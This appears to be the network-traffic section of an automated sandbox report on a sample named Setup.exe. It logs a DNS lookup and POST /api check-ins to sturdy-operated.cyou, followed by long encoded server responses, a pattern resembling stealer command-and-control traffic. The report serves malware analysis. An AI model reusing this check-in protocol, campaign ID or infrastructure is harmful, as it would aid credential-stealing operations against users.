                                                                        Nov 23, 2024 12:13:24.908044100 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.122591019 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.122673035 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.124104977 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.124114990 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.124481916 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.125706911 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.125897884 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.125931025 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.125997066 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.126002073 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.869348049 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.869471073 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:26.869533062 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.869692087 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:26.869705915 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:27.065709114 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:27.065743923 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:27.065853119 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:27.066245079 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:27.066260099 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:28.323148966 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:28.323220968 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:28.325045109 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:28.325052023 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:28.325289011 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:28.326754093 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:28.326886892 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:28.326919079 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:28.326987982 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:28.326997042 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:29.162974119 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:29.163254976 CET44349756104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:29.163273096 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:29.163309097 CET49756443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:29.449516058 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:29.449593067 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:29.449677944 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:29.450025082 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:29.450056076 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:30.768866062 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:30.769011974 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:30.770333052 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:30.770354986 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:30.770699978 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:30.771919012 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:30.772016048 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:30.772027969 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:31.363195896 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:31.363456011 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:31.363473892 CET44349762104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:31.363528967 CET49762443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:31.766724110 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:31.766746044 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:31.766834021 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:31.767200947 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:31.767213106 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.988506079 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.988573074 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.989960909 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.989968061 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.990457058 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.992741108 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.993707895 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.993750095 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.993953943 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.993995905 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.994124889 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.994179010 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.995495081 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.995521069 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.996342897 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.996370077 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.996526003 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.996555090 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:32.996570110 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.996706009 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:32.996740103 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.039407969 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:33.039613962 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.039664984 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.039689064 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.087327003 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:33.087547064 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.087593079 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.087616920 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.131378889 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:33.131486893 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:33.179333925 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:33.354995966 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:35.072922945 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:35.073065042 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:35.073167086 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:35.073450089 CET49769443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:35.073461056 CET44349769104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:35.124406099 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:35.124454975 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:35.124631882 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:35.124854088 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:35.124870062 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:36.449289083 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:36.449361086 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:36.450928926 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:36.450936079 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:36.451261997 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:36.452683926 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:36.452701092 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:36.452765942 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:37.141321898 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:37.141438961 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:37.141521931 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:37.149202108 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:37.149226904 CET44349779104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:37.149276972 CET49779443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:37.149283886 CET44349779104.21.20.178192.168.2.6
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 12:13:17.905471087 CET5675053192.168.2.61.1.1.1
                                                                        Nov 23, 2024 12:13:18.389125109 CET53567501.1.1.1192.168.2.6
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 12:13:17.905471087 CET192.168.2.61.1.1.10xc2fcStandard query (0)sturdy-operated.cyouA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 12:13:18.389125109 CET1.1.1.1192.168.2.60xc2fcNo error (0)sturdy-operated.cyou104.21.20.178A (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 12:13:18.389125109 CET1.1.1.1192.168.2.60xc2fcNo error (0)sturdy-operated.cyou172.67.193.71A (IP address)IN (0x0001)false
                                                                        • sturdy-operated.cyou
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649730104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:19 UTC267OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-11-23 11:13:20 UTC1025INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=coh69l285o3c7ou7pgou75jpcb; expires=Wed, 19-Mar-2025 04:59:59 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPg61Ma2Jyx6DokftdpgLVlMs%2B73Ot46uJoSmY8nldsTnSiyihoYbj%2BsTTXrTmza%2FerOMADAXigHefzGxsCgwJSvb9RQo%2BHGLbQqIC5TKo%2BJBsmqDGxC1IMHwY2VLVlW%2BDMgLg4llg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bab39d2018cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=911&delivery_rate=1713615&cwnd=252&unsent_bytes=0&cid=71903a0602d6330e&ts=713&x=0"
                                                                        2024-11-23 11:13:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-11-23 11:13:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649739104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:21 UTC268OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 46
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:21 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 76 69 63 6b 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--vick&j=
                                                                        2024-11-23 11:13:22 UTC1017INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:22 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=9vaesat6ocgn5p25i4ede2l1f4; expires=Wed, 19-Mar-2025 05:00:01 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBppSbc7BP8jqic4f0dU49Di4Ea72B2nFzd%2FDbBOmyQFyzHzbwSrixOHDopWY52EF19B7UhX5gqP1Pv5T7cmEQOKZEabEWFOopzWy7lf%2B88hXmhVOClUoKAHuhI73a2VSrikuSCCpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bac00b875e65-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=950&delivery_rate=1660034&cwnd=242&unsent_bytes=0&cid=86762a6bc55603af&ts=734&x=0"
                                                                        2024-11-23 11:13:22 UTC352INData Raw: 31 64 38 62 0d 0a 6f 4e 49 4c 30 30 70 79 36 73 44 72 37 6f 31 4e 45 55 4e 56 32 4e 4f 62 52 4f 4c 78 6f 76 4a 72 4d 66 4d 6c 2f 69 61 47 67 5a 48 62 38 48 33 78 63 45 62 47 34 70 69 4c 72 33 64 6c 4d 53 43 39 2f 37 6b 6c 68 74 4f 59 6c 41 70 64 67 45 44 53 42 50 44 73 73 35 71 30 61 72 38 35 46 38 62 69 6a 70 61 76 64 30 6f 34 64 37 32 39 75 58 37 41 6c 4d 69 51 43 6c 32 52 52 4a 56 4a 39 75 33 79 79 4c 35 73 75 79 38 52 6a 71 47 48 67 2b 67 6f 64 43 49 2f 74 72 72 32 4c 49 2f 54 6a 74 41 4f 53 39 45 66 33 47 76 6a 39 66 44 74 73 33 69 34 61 41 2f 47 75 38 6d 4c 34 32 38 72 59 54 53 39 73 66 63 69 68 70 72 4b 6d 67 4e 56 6b 45 47 55 56 75 2f 6e 2b 63 69 77 62 37 6f 6c 47 4a 71 73 6a 59 54 6a 4c 6e 34 69 64 2f 54 78 2f 6a 37 41 79 34 44 44 4f 31 43 41 56
                                                                        Data Ascii: 1d8boNIL00py6sDr7o1NEUNV2NObROLxovJrMfMl/iaGgZHb8H3xcEbG4piLr3dlMSC9/7klhtOYlApdgEDSBPDss5q0ar85F8bijpavd0o4d729uX7AlMiQCl2RRJVJ9u3yyL5suy8RjqGHg+godCI/trr2LI/TjtAOS9Ef3Gvj9fDts3i4aA/Gu8mL428rYTS9sfcihprKmgNVkEGUVu/n+ciwb7olGJqsjYTjLn4id/Tx/j7Ay4DDO1CAV
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 38 70 48 59 69 77 67 59 66 6b 4b 6d 45 71 50 72 65 38 2b 53 75 4b 6e 4d 4f 51 44 6c 6d 62 53 4a 5a 41 36 65 37 31 77 72 41 70 2f 32 67 58 6b 4f 4c 52 7a 4d 77 71 59 79 59 37 72 50 50 44 5a 70 2f 64 32 64 41 4f 58 39 45 66 33 45 7a 68 34 50 44 4a 76 32 71 35 49 77 4b 49 73 49 2b 42 36 6a 31 31 4a 44 6d 77 73 75 73 73 6a 70 58 44 6d 51 4a 61 6c 45 43 59 42 4b 71 6a 39 4e 72 77 4d 66 45 4a 48 59 4f 75 67 35 76 76 62 32 78 76 4c 76 71 32 39 57 62 59 30 38 53 52 44 56 4b 56 53 5a 4a 41 36 4f 58 39 7a 37 39 76 75 79 67 58 67 71 71 42 6a 65 49 6b 66 43 45 79 74 37 58 2f 4b 6f 47 57 67 4e 35 4a 56 49 6b 48 78 41 54 4b 35 50 44 51 38 6c 79 79 4a 68 36 50 74 4d 6d 54 6f 54 59 7a 4a 6a 76 36 36 62 6b 6f 68 5a 7a 53 6b 52 74 57 6e 31 57 51 51 65 4c 75 38 4d 79 77 62
                                                                        Data Ascii: 8pHYiwgYfkKmEqPre8+SuKnMOQDlmbSJZA6e71wrAp/2gXkOLRzMwqYyY7rPPDZp/d2dAOX9Ef3Ezh4PDJv2q5IwKIsI+B6j11JDmwsussjpXDmQJalECYBKqj9NrwMfEJHYOug5vvb2xvLvq29WbY08SRDVKVSZJA6OX9z79vuygXgqqBjeIkfCEyt7X/KoGWgN5JVIkHxATK5PDQ8lyyJh6PtMmToTYzJjv66bkohZzSkRtWn1WQQeLu8Mywb
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 50 74 4d 6d 54 6f 54 59 7a 4a 6a 76 36 36 62 6b 71 69 5a 50 4c 6d 67 31 54 6c 6b 71 5a 52 2b 50 67 2f 73 57 36 5a 37 59 73 48 49 47 76 6a 34 7a 6f 4b 33 59 7a 4d 72 4f 39 39 57 62 4f 30 38 65 49 53 51 76 52 61 4a 74 53 35 38 7a 77 30 37 6b 70 72 6d 59 4a 79 4b 57 46 7a 4c 64 76 64 43 51 2f 73 62 66 78 4a 70 4b 57 7a 70 73 49 57 5a 64 47 6b 55 6a 69 34 2f 4c 43 74 6d 57 78 4c 78 65 61 73 49 79 4b 2f 53 55 7a 62 33 65 39 71 62 6c 2b 77 4b 58 51 68 78 68 46 30 33 4b 66 53 75 72 6b 35 59 4b 76 4a 36 68 6f 46 34 54 69 30 63 7a 6b 4c 33 38 6d 50 37 79 31 38 53 6d 50 6d 74 4b 52 42 56 32 44 51 4a 78 4e 36 75 7a 2f 79 37 31 75 76 43 4d 61 68 61 61 4f 6a 61 39 68 4d 79 59 76 2b 75 6d 35 45 4a 43 65 7a 4c 34 43 58 35 67 48 67 77 72 39 6f 2f 54 4f 38 44 48 78 4c 42
                                                                        Data Ascii: PtMmToTYzJjv66bkqiZPLmg1TlkqZR+Pg/sW6Z7YsHIGvj4zoK3YzMrO99WbO08eISQvRaJtS58zw07kprmYJyKWFzLdvdCQ/sbfxJpKWzpsIWZdGkUji4/LCtmWxLxeasIyK/SUzb3e9qbl+wKXQhxhF03KfSurk5YKvJ6hoF4Ti0czkL38mP7y18SmPmtKRBV2DQJxN6uz/y71uvCMahaaOja9hMyYv+um5EJCezL4CX5gHgwr9o/TO8DHxLB
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 69 4f 6f 71 64 79 59 7a 76 4c 36 35 61 4d 43 55 32 4e 42 52 45 37 35 67 71 51 62 46 32 62 50 64 2f 6e 44 78 4c 78 7a 49 2b 73 6d 41 37 43 4e 37 4c 6a 47 7a 76 66 4d 76 69 35 2f 4c 6c 41 56 61 6c 45 47 64 51 65 48 69 39 38 36 36 62 37 49 72 48 34 65 74 67 63 79 68 62 33 51 35 64 2b 4c 78 33 44 47 4c 6e 63 62 51 46 68 32 49 42 35 74 49 70 4c 75 7a 7a 72 6c 76 74 79 30 63 69 61 53 42 69 65 63 72 63 69 63 78 75 62 37 39 49 34 47 63 78 4a 77 48 57 5a 42 47 6b 45 2f 72 36 50 61 43 2f 69 6d 32 4d 46 44 51 34 72 69 50 2b 54 68 6a 4c 58 65 6c 2f 2b 42 6d 68 35 2b 41 79 45 6c 53 67 30 32 57 53 75 48 73 39 73 47 2f 62 72 77 75 48 49 4b 72 67 59 72 67 4a 6d 45 69 4f 37 53 32 39 79 71 4f 6e 73 71 54 42 42 50 66 42 35 74 63 70 4c 75 7a 37 72 64 6b 6e 79 4d 63 6a 2b 4b
                                                                        Data Ascii: iOoqdyYzvL65aMCU2NBRE75gqQbF2bPd/nDxLxzI+smA7CN7LjGzvfMvi5/LlAValEGdQeHi9866b7IrH4etgcyhb3Q5d+Lx3DGLncbQFh2IB5tIpLuzzrlvty0ciaSBiecrcicxub79I4GcxJwHWZBGkE/r6PaC/im2MFDQ4riP+ThjLXel/+Bmh5+AyElSg02WSuHs9sG/brwuHIKrgYrgJmEiO7S29yqOnsqTBBPfB5tcpLuz7rdknyMcj+K
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 7a 31 68 4d 4b 4c 78 6f 57 61 32 6c 4e 43 41 43 68 47 67 55 5a 39 53 37 2b 37 2f 67 71 38 6e 71 47 67 58 68 4f 4c 52 7a 4f 6b 67 65 69 49 34 75 37 6a 31 4b 34 57 61 78 5a 45 50 56 35 74 4e 6e 45 4c 69 34 76 62 49 73 32 69 37 49 52 65 41 70 59 71 65 72 32 45 7a 4a 69 2f 36 36 62 6b 50 68 34 48 4f 67 45 6c 4d 33 31 37 63 51 2b 69 6a 71 34 4b 30 59 37 34 73 46 34 53 6b 6a 49 72 69 4c 6e 77 67 4e 37 57 31 38 69 2b 47 6b 73 32 56 42 46 65 44 54 5a 64 4c 36 4f 72 2f 7a 2f 41 6e 38 53 38 49 79 50 72 4a 76 65 49 68 66 53 59 68 2b 71 36 33 50 38 43 55 7a 4e 42 52 45 35 42 4c 6b 30 66 72 34 50 44 44 75 6e 75 6a 4a 42 6d 41 70 34 57 48 34 53 6c 68 4a 7a 69 7a 73 76 6f 76 68 35 76 4d 6d 67 70 55 30 51 6e 63 51 2f 79 6a 71 34 4b 54 66 71 45 6c 55 4a 66 73 6b 4d 7a 6f
                                                                        Data Ascii: z1hMKLxoWa2lNCAChGgUZ9S7+7/gq8nqGgXhOLRzOkgeiI4u7j1K4WaxZEPV5tNnELi4vbIs2i7IReApYqer2EzJi/66bkPh4HOgElM317cQ+ijq4K0Y74sF4SkjIriLnwgN7W18i+Gks2VBFeDTZdL6Or/z/An8S8IyPrJveIhfSYh+q63P8CUzNBRE5BLk0fr4PDDunujJBmAp4WH4SlhJzizsvovh5vMmgpU0QncQ/yjq4KTfqElUJfskMzo
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 47 30 6f 2f 77 67 6a 35 7a 4a 6d 51 31 62 6b 6b 65 59 51 4f 50 6d 38 4d 36 37 62 72 49 6e 46 49 47 73 67 49 4f 76 59 54 4d 6d 4c 2f 72 70 75 51 65 62 6b 4d 79 64 53 55 7a 66 58 74 78 44 36 4b 4f 72 67 72 78 6e 74 43 67 61 6a 71 61 4d 69 75 55 71 63 79 6f 30 74 62 58 2f 49 6f 2b 54 79 35 6b 49 56 5a 52 4e 6c 30 4c 70 34 50 58 45 38 43 66 78 4c 77 6a 49 2b 73 6d 73 39 43 4a 2f 4a 6e 65 6c 2f 2b 42 6d 68 35 2b 41 79 45 6c 59 6e 55 4f 62 52 4f 6e 67 2b 38 65 30 59 37 51 6f 47 4a 71 71 69 59 76 39 50 58 4d 6f 4d 72 61 79 2b 53 4b 47 6d 73 61 54 44 52 50 66 42 35 74 63 70 4c 75 7a 37 37 78 75 6d 43 38 4c 79 4c 33 48 6c 61 38 6f 66 32 46 76 2b 72 44 79 4c 49 2b 65 77 35 59 4b 57 4a 52 4e 6e 55 50 73 37 75 48 42 76 32 61 31 4b 42 2b 4f 70 49 69 44 36 53 68 36 49
                                                                        Data Ascii: G0o/wgj5zJmQ1bkkeYQOPm8M67brInFIGsgIOvYTMmL/rpuQebkMydSUzfXtxD6KOrgrxntCgajqaMiuUqcyo0tbX/Io+Ty5kIVZRNl0Lp4PXE8CfxLwjI+sms9CJ/Jnel/+Bmh5+AyElYnUObROng+8e0Y7QoGJqqiYv9PXMoMray+SKGmsaTDRPfB5tcpLuz77xumC8LyL3Hla8of2Fv+rDyLI+ew5YKWJRNnUPs7uHBv2a1KB+OpIiD6Sh6I
                                                                        2024-11-23 11:13:22 UTC374INData Raw: 2b 47 4c 36 30 31 70 6f 4f 51 35 5a 51 6b 77 53 71 6f 2f 79 43 36 46 44 78 49 52 65 54 73 35 2b 42 2f 79 67 7a 48 6e 6e 36 71 62 6c 2b 77 4b 62 44 6e 67 64 55 68 31 62 52 59 2f 4c 70 39 4e 4b 33 66 72 35 6f 58 73 69 6b 79 64 53 38 59 54 4d 6c 4a 76 72 70 71 58 54 62 78 70 50 48 57 51 47 4f 43 59 55 45 38 71 4f 72 6b 50 34 70 6f 32 68 49 79 4f 57 4b 6e 76 30 70 63 44 63 30 2f 59 2f 48 41 5a 71 65 78 6f 63 59 62 61 39 41 68 6b 6e 69 39 4f 4b 4f 70 57 71 2f 4a 68 65 65 34 73 66 4d 34 47 38 72 47 48 66 79 38 63 5a 6f 77 49 75 41 79 45 6c 6d 6b 6b 6d 53 51 2f 4c 79 76 75 57 71 5a 4c 63 2f 41 63 6a 73 79 59 71 76 64 79 4e 76 64 37 36 67 75 58 37 51 77 5a 76 46 57 67 54 42 46 59 4d 4b 2f 61 50 6c 67 75 67 37 2f 32 67 43 79 50 72 4a 79 2b 77 39 59 53 63 30 72 4c
                                                                        Data Ascii: +GL601poOQ5ZQkwSqo/yC6FDxIReTs5+B/ygzHnn6qbl+wKbDngdUh1bRY/Lp9NK3fr5oXsikydS8YTMlJvrpqXTbxpPHWQGOCYUE8qOrkP4po2hIyOWKnv0pcDc0/Y/HAZqexocYba9Ahkni9OKOpWq/Jhee4sfM4G8rGHfy8cZowIuAyElmkkmSQ/LyvuWqZLc/AcjsyYqvdyNvd76guX7QwZvFWgTBFYMK/aPlgug7/2gCyPrJy+w9YSc0rL
                                                                        2024-11-23 11:13:22 UTC1369INData Raw: 32 36 65 31 0d 0a 62 6e 75 6b 73 5a 53 4a 77 68 49 2f 36 4d 49 32 63 79 35 45 33 62 62 39 4b 6e 55 66 71 6f 63 4c 55 76 58 6d 79 4c 52 65 32 6e 49 65 4c 2b 79 68 39 4a 7a 66 36 2f 37 6b 70 77 4d 76 35 30 45 45 54 72 67 6e 63 58 4b 53 37 73 2f 65 7a 5a 37 38 76 42 70 6e 76 71 70 72 69 49 48 67 67 64 2f 54 78 2f 32 62 59 77 34 37 51 44 55 4c 52 48 38 77 57 76 37 61 67 6c 65 41 37 72 6d 59 4a 79 4c 54 4a 31 4c 31 68 4d 7a 4e 33 34 76 47 2b 4b 49 32 53 77 35 34 4b 51 59 4e 42 6e 31 4c 6e 70 4d 33 38 6b 57 53 36 4a 42 32 48 71 62 65 79 7a 69 4a 34 4c 54 71 31 75 73 63 59 6c 5a 44 4f 6e 67 35 46 67 41 66 53 42 4f 75 6a 71 2f 76 77 49 66 45 58 58 73 69 36 79 64 53 76 47 6e 41 76 4f 62 32 6e 36 47 75 68 6e 73 75 63 42 46 79 61 42 39 49 45 34 71 4f 72 6b 76 34 70
